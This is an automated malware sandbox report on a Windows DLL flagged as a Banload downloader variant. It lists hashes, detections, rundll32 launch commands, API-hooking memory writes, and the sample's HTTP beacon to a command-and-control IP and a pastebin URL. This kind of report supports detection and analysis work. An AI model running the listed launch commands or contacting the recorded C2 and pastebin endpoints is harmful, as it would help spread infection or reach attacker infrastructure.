
Windows Analysis Report
Y7KU3yvGQ6.dll

Overview

General Information

Sample name: Y7KU3yvGQ6.dll (renamed because the original name is a hash value)
Original sample name: ed7c5857a2a61a69f73ca5f01c0f1c8c.dll
Analysis ID: 1572153
MD5: ed7c5857a2a61a69f73ca5f01c0f1c8c
SHA1: ac4c87194f5b5b731c616bcc9873f8397796e686
SHA256: b3243d65c7b8bea56f75411c660afbc43e701b4cd453b47e61fb5a797a2e6c18
Tags: dll, user-abuse_ch

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Overwrites code with function prologues
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Entry point lies outside standard sections
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7528 cmdline: loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7672 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6944 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5988 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1436 cmdline: rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 1224 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 736 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6748 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6196 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7824 cmdline: rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T07:26:51.667714+0100 | 2833577 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49746 | 192.124.216.14 | 80 | TCP


AV Detection

Source: Y7KU3yvGQ6.dllAvira: detected
Source: Y7KU3yvGQ6.dllReversingLabs: Detection: 55%
Source: Y7KU3yvGQ6.dllVirustotal: Detection: 44%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: Y7KU3yvGQ6.dllJoe Sandbox ML: detected
Source: Y7KU3yvGQ6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: Y7KU3yvGQ6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Source: Network trafficSuricata IDS: 2833577 - Severity 1 - ETPRO MALWARE Banload Variant CnC Activity : 192.168.2.10:49746 -> 192.124.216.14:80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.124.216.14 80
Source: global trafficHTTP traffic detected:
  POST /conta/index.php HTTP/1.0
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 0
  Host: 192.124.216.14
  Accept: text/html, */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownTCP traffic detected without corresponding DNS query: 192.124.216.14
Source: unknownHTTP traffic detected:
  POST /conta/index.php HTTP/1.0
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 0
  Host: 192.124.216.14
  Accept: text/html, */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Source: rundll32.exeString found in binary or memory: http://192.124.216.14/conta/index.php
Source: rundll32.exe, 00000004.00000002.1839038476.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: http://192.124.216.14/conta/index.phpU
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2544670211.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771012396.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1768168983.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000003.1783546072.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1893636039.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874062186.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1834981367.0000000004D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
Source: rundll32.exe, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://pastebin.com/raw/vn1EtvP0

System Summary

Source: Y7KU3yvGQ6.dllStatic PE information: section name: .#>*
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .:!0
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Muster
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
Source: Y7KU3yvGQ6.dllStatic PE information: Number of sections : 12 > 10
Source: Y7KU3yvGQ6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
Source: classification engineClassification label: mal96.evad.winDLL@26/17@0/1
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6196
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6748
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Aplicativo-Vaister
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6944
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5feea20a-b72a-434b-8e0f-c178f89134c6
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
Source: Y7KU3yvGQ6.dllReversingLabs: Detection: 55%
Source: Y7KU3yvGQ6.dllVirustotal: Detection: 44%
Source: rundll32.exeString found in binary or memory: jp-ocr-hand-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: rundll32.exeString found in binary or memory: jp-ocr-b-add
Source: rundll32.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: rundll32.exeString found in binary or memory: ISO_6937-2-add
Source: rundll32.exeString found in binary or memory: NATS-SEFI-ADD
Source: rundll32.exeString found in binary or memory: NATS-DANO-ADD
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 776
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 768
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 768
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 768
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,GetInstallDetailsPayload
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Y7KU3yvGQ6.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",GetInstallDetailsPayload
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",SignalInitializeCrashReporting
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",__dbk_fcall_wrapper
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: wsock32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: magnification.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: d3d9.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: security.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: secur32.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exeWindow found: window name: TEdit
Source: Y7KU3yvGQ6.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Y7KU3yvGQ6.dllStatic file information: File size 17234944 > 1048576
Source: Y7KU3yvGQ6.dllStatic PE information: Raw size of .:!0 is bigger than: 0x100000 < 0x106e400
Source: Y7KU3yvGQ6.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: initial sampleStatic PE information: section where entry point is pointing to: .:!0
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .didata
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .R6V
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .#>*
Source: Y7KU3yvGQ6.dllStatic PE information: section name: .:!0

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 1224 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 736 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 7763BA30 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 77064D90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 7707EBF0 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 755C8A90 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7824 base: 755F0230 value: 8B FF 55 8B EC Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F50005 value: E9 8B 2F 72 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77672F90 value: E9 7A D0 8D 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F60005 value: E9 2B BA 6D 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7763BA30 value: E9 DA 45 92 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: F70008 value: E9 8B 8E 71 76 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77688E90 value: E9 80 71 8E 89 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10A0005 value: E9 8B 4D FC 75 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 77064D90 value: E9 7A B2 03 8A Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10B0005 value: E9 EB EB FC 75 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 7707EBF0 value: E9 1A 14 03 8A Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10C0005 value: E9 8B 8A 50 74 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755C8A90 value: E9 7A 75 AF 8B Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 10D0005 value: E9 2B 02 52 74 Jump to behavior
Source: C:\Windows\System32\loaddll32.exeMemory written: PID: 7528 base: 755F0230 value: E9 DA FD AD 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 2890005 value: E9 8B 2F DE 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77672F90 value: E9 7A D0 21 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 28B0005 value: E9 2B BA D8 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7763BA30 value: E9 DA 45 27 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 28C0008 value: E9 8B 8E DC 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77688E90 value: E9 80 71 23 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42A0005 value: E9 8B 4D DC 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 77064D90 value: E9 7A B2 23 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42B0005 value: E9 EB EB DC 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 7707EBF0 value: E9 1A 14 23 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42C0005 value: E9 8B 8A 30 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755C8A90 value: E9 7A 75 CF 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 42D0005 value: E9 2B 02 32 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7692 base: 755F0230 value: E9 DA FD CD 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 2AF0005 value: E9 8B 2F B8 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77672F90 value: E9 7A D0 47 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 2B00005 value: E9 2B BA B3 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 7763BA30 value: E9 DA 45 4C 8B Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 4370008 value: E9 8B 8E 31 73 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77688E90 value: E9 80 71 CE 8C Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 4390005 value: E9 8B 4D CD 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 77064D90 value: E9 7A B2 32 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 43B0005 value: E9 EB EB CC 72 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 7707EBF0 value: E9 1A 14 33 8D Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 43C0005 value: E9 8B 8A 20 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 755C8A90 value: E9 7A 75 DF 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 43D0005 value: E9 2B 02 22 71 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6944 base: 755F0230 value: E9 DA FD DD 8E Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 3050005 value: E9 8B 2F 62 74 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 5988 base: 77672F90 value: E9 7A D0 9D 8B Jump to behavior
